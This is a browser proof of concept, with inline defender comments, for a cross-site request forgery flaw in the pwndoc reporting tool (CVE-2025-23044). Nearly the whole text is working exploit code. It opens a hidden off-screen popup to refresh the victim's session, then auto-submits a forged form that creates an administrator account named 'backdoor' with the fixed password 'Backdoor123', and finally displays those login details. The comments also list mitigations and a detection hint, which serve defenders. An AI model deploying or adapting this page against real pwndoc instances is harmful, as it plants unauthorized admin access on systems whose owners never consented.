PoC for pwndoc CSRF vulnerability (CVE-2025-23044)
<!--
  PoC for the pwndoc CSRF (CVE-2025-23044, per the gist title): a page the victim
  visits creates an extra user with the admin role on a pwndoc instance the victim
  is logged into. Defender notes: the flow depends on the browser attaching the
  pwndoc session cookie to a cross-site top-level navigation (the refreshtoken GET)
  and to a cross-site HTML form POST. A SameSite=Lax/Strict attribute on the
  session cookie, an Origin/Referer check on state-changing requests, or a CSRF
  token / custom-header requirement on POST /api/users each break this chain.
-->
<p>Click/press anywhere to trigger the exploit</p>
<script>
// Base URL of the pwndoc instance under test; a local lab default is used here.
const HOST = "https://localhost:8443";
// Poll every 100 ms until the page has a user activation; window.open is gated on it.
const loop = setInterval(() => {
if (navigator.userActivation.isActive) {
// Only allowed when user is active, avoid popup blocker
// Top-level navigation to the refreshtoken endpoint in a tiny off-screen popup.
// The comment below implies this GET re-issues the session cookie; what the
// endpoint actually does is not visible here — verify against pwndoc.
let w = window.open(`${HOST}/api/users/refreshtoken`, "", "width=1,height=1,left=9999,top=9999");
if (w) {
clearInterval(loop);
document.body.innerHTML = "<h1>Exploiting...</h1><p>Refreshing token</p>";
// After cookie is reset, submit the POST form
// Fixed 1 s wait: the PoC assumes the refresh has completed by then
// (timing-based, not event-based, so it can misfire on a slow instance).
setTimeout(() => {
// Random suffix so repeated runs do not collide on the username.
const username = "backdoor" + Math.floor(Math.random() * 100000);
// The self-submitting form is served from a blob: URL inside the popup, so the
// POST is an ordinary cross-site HTML form submission (form-encoded body, no
// custom headers). Detection hint: a user-creation request whose Origin/Referer
// is not pwndoc's own origin is a strong indicator of this pattern.
const blob = new Blob(
[
`
<form action="${HOST}/api/users" method="post">
<input type="hidden" name="username" value="${username}" />
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="password" value="Backdoor123" />
<input type="hidden" name="firstname" value="Back" />
<input type="hidden" name="lastname" value="Door" />
</form>
<script>
document.forms[0].submit();
<\/script>
`,
],
{ type: "text/html" }
);
// Navigate the popup to the form document; it submits itself on load.
w.location = URL.createObjectURL(blob);
document.body.innerHTML = "<h1>Exploiting...</h1><p>Adding administrator</p>";
// Second fixed 1 s wait so the POST has been sent before the popup is closed.
setTimeout(() => {
// Close window to clean up
w.close();
document.body.innerHTML = `<h1>Exploit completed!</h1>
<p>Log in at: <a href="${HOST}/login" target="_blank">${HOST}/login</a></p>
<ul>
<li>Username: <code>${username}</code></li>
<li>Password: <code>Backdoor123</code></li>
</ul>
`;
}, 1000);
}, 1000);
}
}
}, 100);
</script>